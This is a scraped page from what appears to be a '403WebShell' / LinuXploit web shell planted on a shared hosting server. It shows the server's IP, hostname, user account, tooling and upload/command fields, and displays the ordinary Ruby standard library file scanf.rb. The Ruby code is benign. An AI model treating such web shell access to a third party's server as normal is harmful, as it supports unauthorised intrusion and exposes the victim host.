Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.117.119.34
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/alt/ruby25/lib64/ruby/2.5.0/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/alt/ruby25/lib64/ruby/2.5.0//scanf.rb
# frozen_string_literal: false
# scanf for Ruby
#
#--
# $Release Version: 1.1.2 $
# $Revision: 67754 $
# $Id: scanf.rb 67754 2019-08-26 14:18:58Z usa $
# $Author: usa $
#++
#
# == Description
#
# scanf is an implementation of the C function scanf(3), modified as necessary
# for Ruby compatibility.
#
# the methods provided are String#scanf, IO#scanf, and
# Kernel#scanf. Kernel#scanf is a wrapper around STDIN.scanf.  IO#scanf
# can be used on any IO stream, including file handles and sockets.
# scanf can be called either with or without a block.
#
# Scanf scans an input string or stream according to a <b>format</b>, as
# described below in Conversions, and returns an array of matches between
# the format and the input.  The format is defined in a string, and is
# similar (though not identical) to the formats used in Kernel#printf and
# Kernel#sprintf.
#
# The format may contain <b>conversion specifiers</b>, which tell scanf
# what form (type) each particular matched substring should be converted
# to (e.g., decimal integer, floating point number, literal string,
# etc.)  The matches and conversions take place from left to right, and
# the conversions themselves are returned as an array.
#
# The format string may also contain characters other than those in the
# conversion specifiers.  White space (blanks, tabs, or newlines) in the
# format string matches any amount of white space, including none, in
# the input.  Everything else matches only itself.
#
# Scanning stops, and scanf returns, when any input character fails to
# match the specifications in the format string, or when input is
# exhausted, or when everything in the format string has been
# matched. All matches found up to the stopping point are returned in
# the return array (or yielded to the block, if a block was given).
#
#
# == Basic usage
#
#   require 'scanf'
#
#   # String#scanf and IO#scanf take a single argument, the format string
#   array = a_string.scanf("%d%s")
#   array = an_io.scanf("%d%s")
#
#   # Kernel#scanf reads from STDIN
#   array = scanf("%d%s")
#
# == Block usage
#
# When called with a block, scanf keeps scanning the input, cycling back
# to the beginning of the format string, and yields a new array of
# conversions to the block every time the format string is matched
# (including partial matches, but not including complete failures).  The
# actual return value of scanf when called with a block is an array
# containing the results of all the executions of the block.
#
#   str = "123 abc 456 def 789 ghi"
#   str.scanf("%d%s") { |num,str| [ num * 2, str.upcase ] }
#   # => [[246, "ABC"], [912, "DEF"], [1578, "GHI"]]
#
# == Conversions
#
# The single argument to scanf is a format string, which generally
# includes one or more conversion specifiers.  Conversion specifiers
# begin with the percent character ('%') and include information about
# what scanf should next scan for (string, decimal number, single
# character, etc.).
#
# There may be an optional maximum field width, expressed as a decimal
# integer, between the % and the conversion.  If no width is given, a
# default of `infinity' is used (with the exception of the %c specifier;
# see below).  Otherwise, given a field width of <em>n</em> for a given
# conversion, at most <em>n</em> characters are scanned in processing
# that conversion.  Before conversion begins, most conversions skip
# white space in the input string; this white space is not counted
# against the field width.
#
# The following conversions are available.
#
# [%]
#   Matches a literal `%'. That is, `%%' in the format string matches a
#   single input `%' character. No conversion is done, and the resulting
#   '%' is not included in the return array.
#
# [d]
#   Matches an optionally signed decimal integer.
#
# [u]
#   Same as d.
#
# [i]
#   Matches an optionally signed integer. The integer is read in base
#   16 if it begins with `0x' or `0X', in base 8 if it begins with `0',
#   and in base 10 other- wise. Only characters that correspond to the
#   base are recognized.
#
# [o]
#   Matches an optionally signed octal integer.
#
# [x, X]
#   Matches an optionally signed hexadecimal integer,
#
# [a, e, f, g, A, E, F, G]
#   Matches an optionally signed floating-point number.
#
# [s]
#   Matches a sequence of non-white-space character. The input string stops at
#   white space or at the maximum field width, whichever occurs first.
#
# [c]
#   Matches a single character, or a sequence of <em>n</em> characters if a
#   field width of <em>n</em> is specified. The usual skip of leading white
#   space is suppressed. To skip white space first, use an explicit space in
#   the format.
#
# [[]
#   Matches a nonempty sequence of characters from the specified set
#   of accepted characters.  The usual skip of leading white space is
#   suppressed.  This bracketed sub-expression is interpreted exactly like a
#   character class in a Ruby regular expression.  (In fact, it is placed as-is
#   in a regular expression.)  The matching against the input string ends with
#   the appearance of a character not in (or, with a circumflex, in) the set,
#   or when the field width runs out, whichever comes first.
#
# === Assignment suppression
#
# To require that a particular match occur, but without including the result
# in the return array, place the <b>assignment suppression flag</b>, which is
# the star character ('*'), immediately after the leading '%' of a format
# specifier (just before the field width, if any).
#
# == scanf for Ruby compared with scanf in C
#
# scanf for Ruby is based on the C function scanf(3), but with modifications,
# dictated mainly by the underlying differences between the languages.
#
# === Unimplemented flags and specifiers
#
# * The only flag implemented in scanf for Ruby is '<tt>*</tt>' (ignore
#   upcoming conversion).  Many of the flags available in C versions of
#   scanf(3) have to do with the type of upcoming pointer arguments, and are
#   meaningless in Ruby.
#
# * The <tt>n</tt> specifier (store number of characters consumed so far in
#   next pointer) is not implemented.
#
# * The <tt>p</tt> specifier (match a pointer value) is not implemented.
#
# === Altered specifiers
#
# [o, u, x, X]
#   In scanf for Ruby, all of these specifiers scan for an optionally signed
#   integer, rather than for an unsigned integer like their C counterparts.
#
# === Return values
#
# scanf for Ruby returns an array of successful conversions, whereas
# scanf(3) returns the number of conversions successfully
# completed. (See below for more details on scanf for Ruby's return
# values.)
#
# == Return values
#
# Without a block, scanf returns an array containing all the conversions
# it has found.  If none are found, scanf will return an empty array. An
# unsuccessful match is never ignored, but rather always signals the end
# of the scanning operation.  If the first unsuccessful match takes place
# after one or more successful matches have already taken place, the
# returned array will contain the results of those successful matches.
#
# With a block scanf returns a 'map'-like array of transformations from
# the block -- that is, an array reflecting what the block did with each
# yielded result from the iterative scanf operation.  (See "Block
# usage", above.)
#
# == Current limitations and bugs
#
# When using IO#scanf under Windows, make sure you open your files in
# binary mode:
#
#     File.open("filename", "rb")
#
# so that scanf can keep track of characters correctly.
#
# Support for character classes is reasonably complete (since it
# essentially piggy-backs on Ruby's regular expression handling of
# character classes), but users are advised that character class testing
# has not been exhaustive, and that they should exercise some caution
# in using any of the more complex and/or arcane character class
# idioms.
#
# == License and copyright
#
# Copyright:: (c) 2002-2003 David Alan Black
# License:: Distributed on the same licensing terms as Ruby itself
#
# == Warranty disclaimer
#
# This software is provided "as is" and without any express or implied
# warranties, including, without limitation, the implied warranties of
# merchantability and fitness for a particular purpose.
#
# == Credits and acknowledgements
#
# scanf was developed as the major activity of the Austin Ruby Codefest
# (Austin, Texas, August 2002).
#
# Principal author:: David Alan Black (mailto:dblack@superlink.net)
# Co-author:: Hal Fulton (mailto:hal9000@hypermetrics.com)
# Project contributors:: Nolan Darilek, Jason Johnston
#
# Thanks to Hal Fulton for hosting the Codefest.
#
# Thanks to Matz for suggestions about the class design.
#
# Thanks to Gavin Sinclair for some feedback on the documentation.
#
# The text for parts of this document, especially the Description and
# Conversions sections, above, were adapted from the Linux Programmer's
# Manual manpage for scanf(3), dated 1995-11-01.
#
# == Bugs and bug reports
#
# scanf for Ruby is based on something of an amalgam of C scanf
# implementations and documentation, rather than on a single canonical
# description.  Suggestions for features and behaviors which appear in
# other scanfs, and would be meaningful in Ruby, are welcome, as are
# reports of suspicious behaviors and/or bugs.  (Please see "Credits and
# acknowledgements", above, for email addresses.)

module Scanf
  # :stopdoc:

  # ==Technical notes
  #
  # ===Rationale behind scanf for Ruby
  #
  # The impetus for a scanf implementation in Ruby comes chiefly from the fact
  # that existing pattern matching operations, such as Regexp#match and
  # String#scan, return all results as strings, which have to be converted to
  # integers or floats explicitly in cases where what's ultimately wanted are
  # integer or float values.
  #
  # ===Design of scanf for Ruby
  #
  # scanf for Ruby is essentially a <format string>-to-<regular
  # expression> converter.
  #
  # When scanf is called, a FormatString object is generated from the
  # format string ("%d%s...") argument. The FormatString object breaks the
  # format string down into atoms ("%d", "%5f", "blah", etc.), and from
  # each atom it creates a FormatSpecifier object, which it
  # saves.
  #
  # Each FormatSpecifier has a regular expression fragment and a "handler"
  # associated with it. For example, the regular expression fragment
  # associated with the format "%d" is "([-+]?\d+)", and the handler
  # associated with it is a wrapper around String#to_i. scanf itself calls
  # FormatString#match, passing in the input string. FormatString#match
  # iterates through its FormatSpecifiers; for each one, it matches the
  # corresponding regular expression fragment against the string. If
  # there's a match, it sends the matched string to the handler associated
  # with the FormatSpecifier.
  #
  # Thus, to follow up the "%d" example: if "123" occurs in the input
  # string when a FormatSpecifier consisting of "%d" is reached, the "123"
  # will be matched against "([-+]?\d+)", and the matched string will be
  # rendered into an integer by a call to to_i.
  #
  # The rendered match is then saved to an accumulator array, and the
  # input string is reduced to the post-match substring. Thus the string
  # is "eaten" from the left as the FormatSpecifiers are applied in
  # sequence.  (This is done to a duplicate string; the original string is
  # not altered.)
  #
  # As soon as a regular expression fragment fails to match the string, or
  # when the FormatString object runs out of FormatSpecifiers, scanning
  # stops and results accumulated so far are returned in an array.

  class FormatSpecifier

    attr_reader :re_string, :matched_string, :conversion, :matched

    private

    def skip;  /^\s*%\*/.match(@spec_string); end

    def extract_float(s)
      return nil unless s &&! skip
      if /\A(?<sign>[-+]?)0[xX](?<frac>\.\h+|\h+(?:\.\h*)?)[pP](?<exp>[-+]?\d+)/ =~ s
        f1, f2 = frac.split('.')
        f = f1.hex
        if f2
          len = f2.length
          if len > 0
            f += f2.hex / (16.0 ** len)
          end
        end
        (sign == ?- ? -1 : 1) * Math.ldexp(f, exp.to_i)
      elsif /\A([-+]?\d+)\.([eE][-+]\d+)/ =~ s
        ($1 << $2).to_f
      else
        s.to_f
      end
    end
    def extract_decimal(s); s.to_i if s &&! skip; end
    def extract_hex(s); s.hex if s &&! skip; end
    def extract_octal(s); s.oct if s &&! skip; end
    def extract_integer(s); Integer(s) if s &&! skip; end
    def extract_plain(s); s unless skip; end

    def nil_proc(s); nil; end

    public

    def to_s
      @spec_string
    end

    def count_space?
      /(?:\A|\S)%\*?\d*c|%\d*\[/.match(@spec_string)
    end

    def initialize(str)
      @spec_string = str
      h = '[A-Fa-f0-9]'

      @re_string, @handler =
        case @spec_string

          # %[[:...:]]
        when /%\*?(\[\[:[a-z]+:\]\])/
          [ "(#{$1}+)", :extract_plain ]

          # %5[[:...:]]
        when /%\*?(\d+)(\[\[:[a-z]+:\]\])/
          [ "(#{$2}{1,#{$1}})", :extract_plain ]

          # %[...]
        when /%\*?\[([^\]]*)\]/
          yes = $1
          if /^\^/.match(yes) then no = yes[1..-1] else no = '^' + yes end
          [ "([#{yes}]+)(?=[#{no}]|\\z)", :extract_plain ]

          # %5[...]
        when /%\*?(\d+)\[([^\]]*)\]/
          yes = $2
          w = $1
          [ "([#{yes}]{1,#{w}})", :extract_plain ]

          # %i
        when /%\*?i/
          [ "([-+]?(?:(?:0[0-7]+)|(?:0[Xx]#{h}+)|(?:[1-9]\\d*)))", :extract_integer ]

          # %5i
        when /%\*?(\d+)i/
          n = $1.to_i
          s = "("
          if n > 1 then s += "[1-9]\\d{1,#{n-1}}|" end
          if n > 1 then s += "0[0-7]{1,#{n-1}}|" end
          if n > 2 then s += "[-+]0[0-7]{1,#{n-2}}|" end
          if n > 2 then s += "[-+][1-9]\\d{1,#{n-2}}|" end
          if n > 2 then s += "0[Xx]#{h}{1,#{n-2}}|" end
          if n > 3 then s += "[-+]0[Xx]#{h}{1,#{n-3}}|" end
          s += "\\d"
          s += ")"
          [ s, :extract_integer ]

          # %d, %u
        when /%\*?[du]/
          [ '([-+]?\d+)', :extract_decimal ]

          # %5d, %5u
        when /%\*?(\d+)[du]/
          n = $1.to_i
          s = "("
          if n > 1 then s += "[-+]\\d{1,#{n-1}}|" end
          s += "\\d{1,#{$1}})"
          [ s, :extract_decimal ]

          # %x
        when /%\*?[Xx]/
          [ "([-+]?(?:0[Xx])?#{h}+)", :extract_hex ]

          # %5x
        when /%\*?(\d+)[Xx]/
          n = $1.to_i
          s = "("
          if n > 3 then s += "[-+]0[Xx]#{h}{1,#{n-3}}|" end
          if n > 2 then s += "0[Xx]#{h}{1,#{n-2}}|" end
          if n > 1 then s += "[-+]#{h}{1,#{n-1}}|" end
          s += "#{h}{1,#{n}}"
          s += ")"
          [ s, :extract_hex ]

          # %o
        when /%\*?o/
          [ '([-+]?[0-7]+)', :extract_octal ]

          # %5o
        when /%\*?(\d+)o/
          [ "([-+][0-7]{1,#{$1.to_i-1}}|[0-7]{1,#{$1}})", :extract_octal ]

          # %f
        when /%\*?[aefgAEFG]/
          [ '([-+]?(?:0[xX](?:\.\h+|\h+(?:\.\h*)?)[pP][-+]?\d+|\d+(?![\d.])|\d*\.\d*(?:[eE][-+]?\d+)?))', :extract_float ]

          # %5f
        when /%\*?(\d+)[aefgAEFG]/
          [ '(?=[-+]?(?:0[xX](?:\.\h+|\h+(?:\.\h*)?)[pP][-+]?\d+|\d+(?![\d.])|\d*\.\d*(?:[eE][-+]?\d+)?))' +
            "(\\S{1,#{$1}})", :extract_float ]

          # %5s
        when /%\*?(\d+)s/
          [ "(\\S{1,#{$1}})", :extract_plain ]

          # %s
        when /%\*?s/
          [ '(\S+)', :extract_plain ]

          # %c
        when /\s%\*?c/
          [ "\\s*(.)", :extract_plain ]

          # %c
        when /%\*?c/
          [ "(.)", :extract_plain ]

          # %5c (whitespace issues are handled by the count_*_space? methods)
        when /%\*?(\d+)c/
          [ "(.{1,#{$1}})", :extract_plain ]

          # %%
        when /%%/
          [ '(\s*%)', :nil_proc ]

          # literal characters
        else
          [ "(#{Regexp.escape(@spec_string)})", :nil_proc ]
        end

      @re_string = '\A' + @re_string
    end

    def to_re
      Regexp.new(@re_string,Regexp::MULTILINE)
    end

    def match(str)
      @matched = false
      s = str.dup
      s.sub!(/\A\s+/,'') unless count_space?
      res = to_re.match(s)
      if res
        @conversion = send(@handler, res[1])
        @matched_string = @conversion.to_s
        @matched = true
      end
      res
    end

    def letter
      @spec_string[/%\*?\d*([a-z\[])/, 1]
    end

    def width
      @spec_string[/%\*?(\d+)/, 1]&.to_i
    end

    def mid_match?
      return false unless @matched
      cc_no_width    = letter == '[' &&! width
      c_or_cc_width  = (letter == 'c' || letter == '[') && width
      width_left     = c_or_cc_width && (matched_string.size < width)

      return width_left || cc_no_width
    end

  end

  class FormatString

    attr_reader :string_left, :last_spec_tried,
                :last_match_tried, :matched_count, :space

    SPECIFIERS = 'diuXxofFeEgGscaA'
    REGEX = /
        # possible space, followed by...
          (?:\s*
          # percent sign, followed by...
            %
            # another percent sign, or...
              (?:%|
                 # optional assignment suppression flag
                 \*?
                 # optional maximum field width
                 \d*
                   # named character class, ...
                   (?:\[\[:\w+:\]\]|
                   # traditional character class, or...
                      \[[^\]]*\]|
                   # specifier letter.
                      [#{SPECIFIERS}])))|
            # or miscellaneous characters
              [^%\s]+/ix

    def initialize(str)
      @specs = []
      @i = 1
      s = str.to_s
      return unless /\S/.match(s)
      @space = true if /\s\z/.match(s)
      @specs.replace s.scan(REGEX).map {|spec| FormatSpecifier.new(spec) }
    end

    def to_s
      @specs.join('')
    end

    def prune(n=matched_count)
      n.times { @specs.shift }
    end

    def spec_count
      @specs.size
    end

    def last_spec
      @i == spec_count - 1
    end

    def match(str)
      accum = []
      @string_left = str
      @matched_count = 0

      @specs.each_with_index do |spec,i|
        @i=i
        @last_spec_tried = spec
        @last_match_tried = spec.match(@string_left)
        break unless @last_match_tried
        @matched_count += 1

        accum << spec.conversion

        @string_left = @last_match_tried.post_match
        break if @string_left.empty?
      end
      return accum.compact
    end
  end
  # :startdoc:
end

class IO

  #:stopdoc:
  # The trick here is doing a match where you grab one *line*
  # of input at a time.  The linebreak may or may not occur
  # at the boundary where the string matches a format specifier.
  # And if it does, some rule about whitespace may or may not
  # be in effect...
  #
  # That's why this is much more elaborate than the string
  # version.
  #
  # For each line:
  #
  # Match succeeds (non-emptily)
  # and the last attempted spec/string sub-match succeeded:
  #
  #   could the last spec keep matching?
  #     yes: save interim results and continue (next line)
  #
  # The last attempted spec/string did not match:
  #
  # are we on the next-to-last spec in the string?
  #   yes:
  #     is fmt_string.string_left all spaces?
  #       yes: does current spec care about input space?
  #         yes: fatal failure
  #         no: save interim results and continue
  #   no: continue  [this state could be analyzed further]
  #
  #:startdoc:

  # Scans the current string until the match is exhausted,
  # yielding each match as it is encountered in the string.
  # A block is not necessary though, as the results will simply
  # be aggregated into the final array.
  #
  #   "123 456".block_scanf("%d")
  #   # => [123, 456]
  #
  # If a block is given, the value from that is returned from
  # the yield is added to an output array.
  #
  #   "123 456".block_scanf("%d") do |digit,| # the ',' unpacks the Array
  #     digit + 100
  #   end
  #   # => [223, 556]
  #
  # See Scanf for details on creating a format string.
  #
  # You will need to require 'scanf' to use IO#scanf.
  def scanf(str,&b) #:yield: current_match
    return block_scanf(str,&b) if b
    return [] unless str.size > 0

    start_position = pos rescue 0
    matched_so_far = 0
    source_buffer = ""
    result_buffer = []
    final_result = []

    fstr = Scanf::FormatString.new(str)

    loop do
      if eof || (tty? &&! fstr.match(source_buffer))
        final_result.concat(result_buffer)
        break
      end

      source_buffer << gets

      current_match = fstr.match(source_buffer)

      spec = fstr.last_spec_tried

      if spec.matched
        if spec.mid_match?
          result_buffer.replace(current_match)
          next
        end

      elsif (fstr.matched_count == fstr.spec_count - 1)
        if /\A\s*\z/.match(fstr.string_left)
          break if spec.count_space?
          result_buffer.replace(current_match)
          next
        end
      end

      final_result.concat(current_match)

      matched_so_far += source_buffer.size
      source_buffer.replace(fstr.string_left)
      matched_so_far -= source_buffer.size
      break if fstr.last_spec
      fstr.prune
    end

    begin
      seek(start_position + matched_so_far, IO::SEEK_SET)
    rescue Errno::ESPIPE, Errno::EINVAL
    end

    soak_up_spaces if fstr.last_spec && fstr.space

    return final_result
  end

  private

  def soak_up_spaces
    c = getc
    ungetc(c) if c
    until eof ||! c || /\S/.match(c.chr)
      c = getc
    end
    ungetc(c) if (c && /\S/.match(c.chr))
  end

  def block_scanf(str)
    final = []
# Sub-ideal, since another FS gets created in scanf.
# But used here to determine the number of specifiers.
    fstr = Scanf::FormatString.new(str)
    last_spec = fstr.last_spec
    begin
      current = scanf(str)
      break if current.empty?
      final.push(yield(current))
    end until eof || fstr.last_spec_tried == last_spec
    return final
  end
end

class String

  # :section: scanf
  #
  # You will need to require 'scanf' to use these methods

  # Scans the current string. If a block is given, it
  # functions exactly like block_scanf.
  #
  #   arr = "123 456".scanf("%d%d")
  #   # => [123, 456]
  #
  #   require 'pp'
  #
  #   "this 123 read that 456 other".scanf("%s%d%s") {|m| pp m}
  #
  #   # ["this", 123, "read"]
  #   # ["that", 456, "other"]
  #   # => [["this", 123, "read"], ["that", 456, "other"]]
  #
  # See Scanf for details on creating a format string.
  #
  # You will need to require 'scanf' to use String#scanf
  def scanf(fstr,&b) #:yield: current_match
    if b
      block_scanf(fstr,&b)
    else
      fs =
        if fstr.is_a? Scanf::FormatString
          fstr
        else
          Scanf::FormatString.new(fstr)
        end
      fs.match(self)
    end
  end

  # Scans the current string until the match is exhausted
  # yielding each match as it is encountered in the string.
  # A block is not necessary as the results will simply
  # be aggregated into the final array.
  #
  #   "123 456".block_scanf("%d")
  #   # => [123, 456]
  #
  # If a block is given, the value from that is returned from
  # the yield is added to an output array.
  #
  #   "123 456".block_scanf("%d) do |digit,| # the ',' unpacks the Array
  #     digit + 100
  #   end
  #   # => [223, 556]
  #
  # See Scanf for details on creating a format string.
  #
  # You will need to require 'scanf' to use String#block_scanf
  def block_scanf(fstr) #:yield: current_match
    fs = Scanf::FormatString.new(fstr)
    str = self.dup
    final = []
    begin
      current = str.scanf(fs)
      final.push(yield(current)) unless current.empty?
      str = fs.string_left
    end until current.empty? || str.empty?
    return final
  end
end

module Kernel
  private
  # Scans STDIN for data matching +format+.  See IO#scanf for details.
  #
  # See Scanf for details on creating a format string.
  #
  # You will need to require 'scanf' to use Kernel#scanf.
  def scanf(format, &b) #:doc:
    STDIN.scanf(format ,&b)
  end
end

Youez - 2016 - github.com/yon3zu
LinuXploit